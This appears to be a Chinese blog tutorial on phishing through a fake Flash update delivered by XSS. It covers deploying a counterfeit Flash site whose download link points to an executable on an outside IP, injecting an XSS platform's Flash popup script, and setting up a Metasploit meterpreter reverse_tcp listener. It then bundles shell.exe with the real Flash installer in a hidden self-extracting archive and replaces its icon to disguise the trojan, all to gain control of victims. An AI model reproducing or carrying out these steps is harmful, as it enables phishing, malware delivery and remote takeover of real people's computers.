XSS-Flash攻击钓⻥

1.在本机phpstudy中开启web服务

2.下载以下项⽬并将其源码⽂件部署在⽹站根⽬录下...稍作修改并访问..

https://github.com/r00tSe7en/Fake-flash.cn # 旧版
https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash # 新版
修改index.html
<div id="ic-download">
<span> ⽴即下载 </span>
<a href="http://101.42.118.221/test.exe" target="_self"> ⽴即下载
</a>
</div> // 点击以下⻚⾯中的 " ⽴即下载 " 会将如上的 test.exe 下载到本地!

3.来到xss平台 点击公共模块---flash弹窗钓⻥-查看 将其中的代码保存成⼀个js⽂件放到我们⽹

站的根⽬录下⾯
4. 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站(本机IP)
5. 进⼀步对提供下载的Flash⽂件进⾏伪装...在真的Flash官⽹下载安装程序并使⽤MSF⽣成⼀个⽊
使用kali的MSF生成Payload,在桌面上生成shell.exe文件
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run

6.将官网下载的flash安装包和本地的shell.exe打包压缩文件名为“xxx.exe”,点击"⾼级"标签⻚下的"⾃解压选项"填写解压路径为 C:\Windows\Temp

7.点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"

C:\Windows\Temp\shell.exe
C:\Windows\Temp\flashcenter_pp_ax_install_cn.exe
8.在更新下选择解压并更新文件和覆盖所有文件

9.使⽤ ResourceHacker 修改图标,下载安装;通过ResourceHacker打开原版的flash安

装程序,点击 Icon Group ⽂件夹中的⽂件,⿏标右键"保存*.ico资源",即可导出ico图标
点击第一行,保存flash图标文件,再将压缩包拖入点击Replace,选择保存的图标文件进行替换
10. 模拟受害者的流程 最终获取到受害者⽹站控制权
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值